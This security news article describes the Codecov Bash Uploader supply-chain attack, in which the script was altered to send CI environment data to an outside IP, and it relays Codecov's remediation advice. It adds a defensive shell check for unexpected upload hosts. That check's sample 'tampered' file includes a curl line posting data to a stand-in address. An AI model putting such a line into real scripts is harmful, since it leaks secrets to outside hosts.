Codecov, an online platform for measuring code coverage, discovered that a threat actor had compromised its platform and made some changes in its code repository. The first signs of this software supply chain attack were traced back to late January. The platform, which hosts code testing reports and statistics, has a customer base of 29,000 enterprises.

What has happened?

An unknown threat actor compromised Codecov and modified its Bash Uploader script, exposing sensitive information in customers’ continuous integration environments.
  • The attackers started to target Bash Uploader on January 31, when they modified the script to deliver the info from the customers’ environment to a server outside Codecov’s infrastructure.
  • The attackers took advantage of an error in the process of creating Codecov’s Docker image, which allowed them to extract the credentials that protected the Bash Uploader script against modification.
  • Originally, the script uploaded data from the ENV variable to Codecov's platform. After the modification, Bash Uploader sent the info to a DigitalOcean IP address that was not managed by Codecov.

About the exported data 

According to Codecov, the attackers could have used the malicious version to export sensitive data that includes:
  • Any tokens, credentials, and keys passed through their CI runner accessible when the Bash Uploader script executes.
  • Any data stores, services, and application code that could be accessed via tokens, credentials, or keys.
  • The git remote details of repositories that use the Bash Uploaders to upload their coverage to Codecov in CI.


Due to the potential security risks, Codecov recommends that impacted users re-roll any credentials, tokens, or keys present in the environment variables of CI processes that use the Bash Uploader. In addition, customers with a local version of the script must check whether the attacker’s code added at line 525 exists and replace it with the new code immediately.
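One way to run the local-copy check described above, as an added example that is not Codecov's code: it lists every literal URL in a script whose host is not codecov.io, with its line number, so a hit can be compared against the line the advisory names. The function names, the codecov.io allowlist and the sample file are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not Codecov's code. Function names, the codecov.io allowlist
# and the sample script below are assumptions made for illustration.

audit_uploader() {
    # $1 = local uploader copy. Prints "line<TAB>host<TAB>source line" for each
    # literal URL whose host is not codecov.io or a subdomain of it.
    # Returns 1 if any such URL is found, 0 otherwise.
    awk '
    {
        rest = $0
        while (match(rest, /https?:\/\/[A-Za-z0-9._:@-]+/)) {
            host = tolower(substr(rest, RSTART, RLENGTH))
            rest = substr(rest, RSTART + RLENGTH)
            sub(/^https?:\/\//, "", host)
            sub(/^.*@/, "", host)        # judge user@host by the real host
            sub(/:[0-9]+$/, "", host)    # ignore an explicit port
            if (host != "codecov.io" && host !~ /\.codecov\.io$/) {
                printf "%d\t%s\t%s\n", NR, host, $0
                bad = 1
            }
        }
    }
    END { exit bad + 0 }
    ' "$1"
}

make_sample() {
    # Constructed stand-in for a tampered local copy (not the real uploader).
    # 203.0.113.7 is a reserved documentation address.
    cat > "$1" <<'EOF'
#!/usr/bin/env bash
url="https://codecov.io"
curl -s -X POST "https://codecov.io/upload/v4?package=bash"
curl -s -d "$payload" http://203.0.113.7/upload/v2 || true
curl -s "https://uploader.codecov.io/latest"
EOF
}

# Audit the file given as $1, or the constructed sample when none is given.
target=${1:-}
if [ -z "$target" ]; then
    target=$(mktemp)
    make_sample "$target"
fi
audit_uploader "$target" || echo "unexpected upload destination(s) listed above" >&2
```

A destination assembled from variables does not appear as a literal URL, so a clean result is one check among several and does not replace re-rolling the credentials.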

Cyware Publisher